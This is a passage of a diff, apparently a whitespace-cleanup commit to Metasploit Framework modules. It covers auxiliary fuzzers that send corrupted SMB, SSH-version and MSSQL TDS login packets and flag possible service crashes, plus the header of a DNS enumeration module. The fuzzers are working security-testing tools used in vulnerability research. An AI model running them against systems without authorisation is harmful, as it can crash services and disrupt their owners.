def do_smb_login(pkt,opts={})
@connected = false
connect
smb_login
-
+
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
-
+
# Connect in order to get the server-assigned user-id/tree-id
connect
smb_login
pkt = make_smb_create
disconnect
-
+
last_str = nil
last_inp = nil
last_err = nil
-
+
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB create pipe with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -79,42 +79,42 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_create
filename = datastore['SMBPIPE']
disposition = 1
impersonation = 2
-
+
pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
-
+
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 24
-
+
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['FileNameLen'] = filename.length
pkt['Payload'].v['CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0
- pkt['Payload'].v['Impersonation'] = impersonation
+ pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Disposition'] = disposition
pkt['Payload'].v['Payload'] = filename + "\x00"
pkt.to_s
View
24 modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate Dialect Corruption',
@@ -32,7 +32,7 @@ def initialize(info = {})
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
-
+
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -40,27 +40,27 @@ def do_smb_negotiate(pkt,opts={})
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_smb_negotiate
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -71,21 +71,21 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12']
View
36 modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB NTLMv1 Login Request Corruption',
@@ -33,37 +33,37 @@ def initialize(info = {})
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
-
+
def do_smb_login(pkt,opts={})
@connected = false
connect
simple.client.negotiate(false)
-
+
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_smb_login
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB login with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -74,23 +74,23 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_login
-
+
user = "USER"
domain = "DOMAIN"
hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8)
@@ -102,10 +102,10 @@ def make_smb_login
data << user + "\x00"
data << domain + "\x00"
data << 'Windows 2000 2195' + "\x00"
- data << 'Windows 2000 5.0' + "\x00"
-
+ data << 'Windows 2000 5.0' + "\x00"
+
pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct
-
+
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
@@ -113,7 +113,7 @@ def make_smb_login
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['MaxBuff'] = 0xffdf
pkt['Payload'].v['MaxMPX'] = 2
- pkt['Payload'].v['VCNum'] = 1
+ pkt['Payload'].v['VCNum'] = 1
pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
pkt['Payload'].v['Capabilities'] = 64
View
26 modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 1.5 Version Fuzzer',
@@ -31,34 +31,34 @@ def initialize(info = {})
Opt::RPORT(22)
], self.class)
end
-
+
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
-
+
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
ver = make_ssh_version_base
cnt = 0
-
+
fuzz_strings do |str|
cnt += 1
-
+
pkt = ver + str
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ def run
last_inp = @last_fuzzer_input
end
end
-
+
def make_ssh_version_base
"SSH-1.5-"
end
View
26 modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH 2.0 Version Fuzzer',
@@ -31,34 +31,34 @@ def initialize(info = {})
Opt::RPORT(22)
], self.class)
end
-
+
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
-
+
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
ver = make_ssh_version_base
cnt = 0
-
+
fuzz_strings do |str|
cnt += 1
-
+
pkt = ver + str
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ def run
last_inp = @last_fuzzer_input
end
end
-
+
def make_ssh_version_base
"SSH-2.0-"
end
View
26 modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Version Corruption',
@@ -32,37 +32,37 @@ def initialize(info = {})
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
-
+
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
-
+
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_ssh_version
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SSH version string with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -73,16 +73,16 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -92,7 +92,7 @@ def run
last_inp = @last_fuzzer_input
end
end
-
+
def make_ssh_version
"SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1"
end
View
62 modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Corruption Fuzzer',
@@ -31,11 +31,11 @@ def initialize(info = {})
# A copy of the mssql_login method with the ability to overload each option
def make_login(opts={})
-
+
pkt = ""
idx = 0
db = ""
-
+
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -50,42 +50,42 @@ def make_login(opts={})
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
-
-
+
+
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
- aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+ aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
idx = pkt.size + 50 # lengths below
-
+
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
-
+
pkt << [idx, uname.length / 2].pack('vv')
- idx += uname.length
-
+ idx += uname.length
+
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
-
+ idx += aname.length
+
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
-
+
pkt << [0, 0].pack('vv')
-
+
pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
+ idx += aname.length
pkt << [idx, 0].pack('vv')
-
+
pkt << [idx, dname.length / 2].pack('vv')
- idx += dname.length
-
+ idx += dname.length
+
# The total length has to be embedded twice more here
pkt << [
0,
@@ -93,15 +93,15 @@ def make_login(opts={})
0x12345678,
0x12345678
].pack('vVVV')
-
+
pkt << cname
pkt << uname
pkt << pname
- pkt << aname
+ pkt << aname
pkt << sname
pkt << aname
pkt << dname
-
+
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -113,34 +113,34 @@ def make_login(opts={})
pkt
end
-
+
def do_login(pkt,opts={})
@connected = false
disconnect if self.sock
connect
@connected = true
-
+
resp = mssql_send_recv(pkt,opts[:timeout])
-
+
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_login
cnt = 0
fuzz_string_corrupt_byte_reverse(pkt) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
do_login(str,:timeout => 0.50)
rescue ::Interrupt
@@ -151,12 +151,12 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
View
60 modules/auxiliary/fuzzers/tds/tds_login_username.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Username Fuzzer',
@@ -31,16 +31,16 @@ def initialize(info = {})
# A copy of the mssql_login method with the ability to overload each option
def do_login(opts={})
-
+
@connected = false
disconnect if self.sock
connect
@connected = true
-
+
pkt = ""
idx = 0
db = ""
-
+
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -55,42 +55,42 @@ def do_login(opts={})
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
-
-
+
+
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
- aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+ aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
idx = pkt.size + 50 # lengths below
-
+
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
-
+
pkt << [idx, uname.length / 2].pack('vv')
- idx += uname.length
-
+ idx += uname.length
+
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
-
+ idx += aname.length
+
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
-
+
pkt << [0, 0].pack('vv')
-
+
pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
+ idx += aname.length
pkt << [idx, 0].pack('vv')
-
+
pkt << [idx, dname.length / 2].pack('vv')
- idx += dname.length
-
+ idx += dname.length
+
# The total length has to be embedded twice more here
pkt << [
0,
@@ -98,15 +98,15 @@ def do_login(opts={})
0x12345678,
0x12345678
].pack('vVVV')
-
+
pkt << cname
pkt << uname
pkt << pname
- pkt << aname
+ pkt << aname
pkt << sname
pkt << aname
pkt << dname
-
+
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -117,27 +117,27 @@ def do_login(opts={})
pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
resp = mssql_send_recv(pkt,opts[:timeout])
-
+
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
cnt = 0
fuzz_strings do |str|
# capped at 16-bit lengths
next if str.length > 65535
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
do_login(:uname => str, :timeout => 0.50)
rescue ::Interrupt
@@ -148,12 +148,12 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
View
35 modules/auxiliary/gather/dns_enum.rb
@@ -1,32 +1,36 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
require "net/dns/resolver"
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
+
def initialize(info = {})
super(update_info(info,
- 'Name' => 'DNS Enumeration Module',
- 'Description' => %q{
+ 'Name' => 'DNS Enumeration Module',
+ 'Description' => %q{
This module can be used to enumerate various types of information
about a domain from a specific DNS server.
- },
- 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
- 'References' =>
- [
- ['CVE', '1999-0532'],
- ]
- ))
+ },
+ 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['CVE', '1999-0532'],
+ ]
+ ))
+
register_options(
[
OptString.new('DOMAIN', [ true, "The target domain name"]),
@@ -42,6 +46,7 @@ def initialize(info = {})
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false])
], self.class)
+
register_advanced_options(
[
OptInt.new(